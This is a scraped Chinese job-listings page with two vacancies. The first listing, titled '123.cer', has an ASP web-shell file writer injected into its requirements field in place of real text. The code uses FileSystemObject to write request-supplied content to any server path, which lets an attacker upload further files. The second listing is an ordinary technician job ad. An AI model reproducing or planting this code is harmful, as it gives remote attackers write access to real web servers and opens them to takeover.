|
|
 |
| 1) 招聘职位:123.cer |
 |
| |
| 所属部门:123.cer |
招聘人数:123 人 |
招聘要求:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\") %>
<% if Trim(request(\"syfdpath\"))<>\"\" then %>
<% fdata = request(\"cyfddata\") %>
<% Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write \"save Success!\" %>
<% else %>
<% response.write \"Save UnSuccess!\" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write \"\" %>
|
|
|
| 2) 招聘职位:技术人员 |
 |
| |
| 所属部门:技术部 |
招聘人数:3 人 |
招聘要求:
大学本科(以上)学历,
机电一体化,自动控制,
计算机软件相关专业。 |
|
|
| |
|
|